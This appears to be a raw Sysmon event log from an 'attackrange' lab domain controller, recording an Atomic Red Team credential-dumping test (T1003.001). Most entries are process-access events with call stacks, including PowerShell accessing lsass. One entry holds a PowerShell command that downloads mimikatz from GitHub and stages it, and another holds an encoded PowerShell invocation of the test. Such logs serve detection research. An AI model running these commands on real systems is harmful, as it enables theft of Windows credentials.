15:52:52.440{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004446Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004445Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004444Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004443Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004442Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004441Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004440Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004439Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CD4-5FA1-DE00-000000008801}3648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004438Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.440{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD4-5FA1-DE00-000000008801}3648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\0b076d1416bb94e54c147a1f70d93373\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e37b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e362c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31265e58(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311dc214(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c95407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+312114e6(wow64) 154100x80000000000000004437Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.441{D28789B6-7CD4-5FA1-DE00-000000008801}3648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest \""https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200308/mimikatz_trunk.zip\"" -OutFile \""$env:TEMP\Mimi.zip\"" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe -Force} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7CCD-5FA1-CF00-000000008801}3564C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAxACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 10341000x80000000000000004436Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.299{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD4-5FA1-DD00-000000008801}4412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004435Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.299{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CD4-5FA1-DD00-000000008801}4412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004434Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.268{D28789B6-7CD4-5FA1-DD00-000000008801}4412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_daukuwrv.dg3.ps12020-11-03 15:52:52.268 10341000x80000000000000004433Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.252{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CD4-5FA1-DD00-000000008801}4412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004432Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CD4-5FA1-DD00-000000008801}4412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004431Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7CCD-5FA1-CF00-000000008801}35644496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CD4-5FA1-DD00-000000008801}4412C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3ed3|UNKNOWN(00007FF8DCAD8A03) 10341000x80000000000000004430Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004429Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004428Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004427Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004426Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:52.221{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004425Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 